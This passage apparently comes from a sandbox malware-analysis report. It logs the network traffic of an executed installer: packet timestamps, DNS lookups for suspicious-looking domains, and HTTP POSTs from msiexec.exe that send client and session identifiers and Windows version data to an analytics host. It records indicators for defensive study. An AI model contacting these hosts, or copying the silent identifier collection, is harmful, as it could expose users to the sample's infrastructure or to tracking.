                              Aug 2, 2024 14:16:50.269990921 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.274343014 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.274357080 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.274424076 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.274441957 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.274501085 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359230042 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359304905 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359447002 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359447002 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359520912 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359587908 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359658957 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359704971 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359729052 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359744072 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359777927 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359802008 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359812975 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359884977 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359890938 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359914064 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359951973 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:50.359954119 CEST49707443192.168.2.9188.114.97.3
                              Aug 2, 2024 14:16:50.359988928 CEST44349707188.114.97.3192.168.2.9
                              Aug 2, 2024 14:16:57.594360113 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:57.599257946 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:57.599442005 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:57.599442005 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:57.599531889 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:57.604340076 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:57.604531050 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.100822926 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.101078033 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.108182907 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.108182907 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.113059998 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.113518000 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.279961109 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.280052900 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.281263113 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.281263113 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.287998915 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.288012981 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.399899006 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.400227070 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.401258945 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.401294947 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.406272888 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.406318903 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.519922018 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.520068884 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.534373045 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.534404993 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.539324999 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.539482117 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.707993031 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.708055019 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.709405899 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.709405899 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.714474916 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.714509010 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.828140020 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.828216076 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.829271078 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.829318047 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:58.834142923 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:58.834325075 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.000760078 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.000828981 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.003102064 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.003117085 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.009773016 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.120764017 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.120820045 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.121942043 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.122000933 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.127309084 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.238928080 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.238976955 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.241369963 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.241449118 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.246347904 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.357131958 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.357207060 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.359544039 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.359591961 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.364545107 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.476516962 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.476644993 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.477715969 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.477715969 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.482556105 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.482690096 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.646718025 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.646763086 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.648118019 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.648137093 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.653043985 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.653073072 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.822338104 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.822396040 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.823615074 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.823615074 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.828423023 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.828613043 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.995480061 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:16:59.995708942 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.996782064 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:16:59.996782064 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.001971960 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.002038956 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.170614958 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.170890093 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.171952009 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.171952009 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.176768064 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.177005053 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.344228029 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.344289064 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.345217943 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.345236063 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.350058079 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.350131035 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.515794992 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.515856981 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.517040968 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.517110109 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.521955013 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.634789944 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.634854078 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.636797905 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.636878014 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.641694069 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.753201008 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.753284931 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.754173994 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.754194021 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.759035110 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.759144068 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.927346945 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.929624081 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.930677891 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.931142092 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:00.935519934 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:00.936002970 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.105218887 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.105312109 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.106472969 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.106537104 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.111370087 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.111471891 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.300098896 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.300205946 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.301229954 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.301285982 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.306797028 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.418885946 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.419059038 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.420043945 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.420109987 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.424913883 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.425221920 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.591351032 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.591470957 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.592506886 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.592506886 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.597331047 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.597480059 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.763144970 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.767250061 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.772264004 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.772264004 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.777264118 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.889184952 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.889631033 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.890789986 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.890789986 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:01.895649910 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:01.896073103 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.076070070 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.079215050 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.084894896 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.085097075 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.092137098 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.092256069 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.261106968 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.261194944 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.262398005 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.262456894 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.267357111 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.267482996 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.434998989 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.435204983 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.436314106 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.436331987 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.441195011 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.441540003 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.607554913 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.607625008 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.608793974 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.608875036 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.613733053 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.613775015 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.779546022 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.779659033 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.782300949 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.782339096 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.787312984 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.787399054 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.955787897 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.955846071 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.957190990 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.957247972 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:02.962069035 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:02.962213039 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.129096985 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.129169941 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.143570900 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.143620014 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.148607016 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.264168024 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.267318010 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.275492907 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.275531054 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.280518055 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.280663013 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.447489023 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.447547913 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.448471069 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.448471069 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.453557014 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.453597069 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.624078989 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.624187946 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.625138998 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.625224113 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.630122900 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.630410910 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.797333002 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.799262047 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.802505016 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.802505016 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.808473110 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.808542013 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.975414991 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:03.975563049 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.976695061 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.976746082 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:03.982608080 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:04.104751110 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:04.104878902 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:04.106086969 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:04.106195927 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:04.111268044 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:05.217828035 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:05.217884064 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:05.219234943 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:05.219281912 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:05.220309019 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:05.220361948 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:05.221962929 CEST804971052.54.161.79192.168.2.9
                              Aug 2, 2024 14:17:05.222019911 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:05.293061018 CEST4971080192.168.2.952.54.161.79
                              Aug 2, 2024 14:17:15.654503107 CEST4971280192.168.2.920.15.106.83
                              Aug 2, 2024 14:17:15.659477949 CEST804971220.15.106.83192.168.2.9
                              Aug 2, 2024 14:17:15.659550905 CEST4971280192.168.2.920.15.106.83
                              Aug 2, 2024 14:17:15.660221100 CEST4971280192.168.2.920.15.106.83
                              Aug 2, 2024 14:17:15.665112019 CEST804971220.15.106.83192.168.2.9
                              Aug 2, 2024 14:17:16.350012064 CEST804971220.15.106.83192.168.2.9
                              Aug 2, 2024 14:17:16.399806976 CEST4971280192.168.2.920.15.106.83
                              Aug 2, 2024 14:17:18.150032043 CEST4971280192.168.2.920.15.106.83
                              Aug 2, 2024 14:17:18.155318975 CEST804971220.15.106.83192.168.2.9
                              Aug 2, 2024 14:17:18.155400038 CEST4971280192.168.2.920.15.106.83

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 2, 2024 14:16:47.016180038 CEST5597453192.168.2.91.1.1.1
                              Aug 2, 2024 14:16:47.038918972 CEST53559741.1.1.1192.168.2.9
                              Aug 2, 2024 14:16:57.573844910 CEST5376453192.168.2.91.1.1.1
                              Aug 2, 2024 14:16:57.593055964 CEST53537641.1.1.1192.168.2.9
                              Aug 2, 2024 14:17:16.367676020 CEST5636853192.168.2.91.1.1.1
                              Aug 2, 2024 14:17:16.386087894 CEST53563681.1.1.1192.168.2.9

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Aug 2, 2024 14:16:47.016180038 CEST192.168.2.91.1.1.10xab06Standard query (0)yznv.prefintions.proA (IP address)IN (0x0001)false
                              Aug 2, 2024 14:16:57.573844910 CEST192.168.2.91.1.1.10x54c2Standard query (0)collect.installeranalytics.comA (IP address)IN (0x0001)false
                              Aug 2, 2024 14:17:16.367676020 CEST192.168.2.91.1.1.10x2d5bStandard query (0)acons2020temix54.lisfA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Aug 2, 2024 14:16:47.038918972 CEST1.1.1.1192.168.2.90xab06No error (0)yznv.prefintions.pro188.114.97.3A (IP address)IN (0x0001)false
                              Aug 2, 2024 14:16:47.038918972 CEST1.1.1.1192.168.2.90xab06No error (0)yznv.prefintions.pro188.114.96.3A (IP address)IN (0x0001)false
                              Aug 2, 2024 14:16:56.467128038 CEST1.1.1.1192.168.2.90x968eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Aug 2, 2024 14:16:56.467128038 CEST1.1.1.1192.168.2.90x968eNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                              Aug 2, 2024 14:16:57.593055964 CEST1.1.1.1192.168.2.90x54c2No error (0)collect.installeranalytics.com52.54.161.79A (IP address)IN (0x0001)false
                              Aug 2, 2024 14:16:57.593055964 CEST1.1.1.1192.168.2.90x54c2No error (0)collect.installeranalytics.com54.167.177.111A (IP address)IN (0x0001)false
                              Aug 2, 2024 14:17:16.386087894 CEST1.1.1.1192.168.2.90x2d5bName error (3)acons2020temix54.lisfnonenoneA (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • yznv.prefintions.pro
                              • collect.installeranalytics.com
                              • 20.15.106.83

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.94971052.54.161.79807176C:\Windows\SysWOW64\msiexec.exe
                              TimestampBytes transferredDirectionData
                              Aug 2, 2024 14:16:57.599442005 CEST241OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 167
                              Cache-Control: no-cache
                              Aug 2, 2024 14:16:57.599531889 CEST167OUTData Raw: 71 74 3d 34 38 38 34 38 32 38 26 74 3d 6c 69 66 65 63 79 63 6c 65 26 6c 63 3d 73 74 61 72 74 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d 38 2e 37 2e 36 2e 38 26 63 69 64 3d 39 34
                              Data Ascii: qt=4884828&t=lifecycle&lc=start&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
                              Aug 2, 2024 14:16:58.100822926 CEST338INHTTP/1.1 200 OK
                              Cache-control: no-cache="set-cookie"
                              Date: Fri, 02 Aug 2024 12:16:58 GMT
                              Set-Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366;PATH=/;MAX-AGE=600
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:58.108182907 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 179
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:58.108182907 CEST179OUTData Raw: 71 74 3d 34 38 38 36 30 31 35 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d 38 2e
                              Data Ascii: qt=4886015&t=property&lb=VersionNT&val=1000&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
                              Aug 2, 2024 14:16:58.279961109 CEST122INHTTP/1.1 200 OK
                              Date: Fri, 02 Aug 2024 12:16:58 GMT
                              X-Powered-By: Express
                              Content-Length: 0
                              Connection: keep-alive
                              Aug 2, 2024 14:16:58.281263113 CEST396OUTPOST / HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded; charset=utf-8
                              User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.19045 ; x64)
                              Host: collect.installeranalytics.com
                              Content-Length: 181
                              Cache-Control: no-cache
                              Cookie: AWSELB=2939936F10270D1CC9821964991403D8EB363D63DEDB1F8F215A0408044F318729EA64130D943CE7783F2A16A31B01C12D70B5AA9BD74C387C0009FC4F39F82D3C14701366
                              Aug 2, 2024 14:16:58.281263113 CEST181OUTData Raw: 71 74 3d 34 38 38 36 31 38 37 26 74 3d 70 72 6f 70 65 72 74 79 26 6c 62 3d 56 65 72 73 69 6f 6e 4e 54 36 34 26 76 61 6c 3d 31 30 30 30 26 76 3d 33 26 61 69 64 3d 36 36 61 63 30 63 39 65 32 66 66 35 30 38 62 66 62 61 38 37 38 61 61 35 26 61 76 3d
                              Data Ascii: qt=4886187&t=property&lb=VersionNT64&val=1000&v=3&aid=66ac0c9e2ff508bfba878aa5&av=8.7.6.8&cid=94BCABD9E1EBB3E75B71854540642746D0A25913&sid=%7BAF3E5550-CCB7-4030-8139-9A55D2075DE7%7D
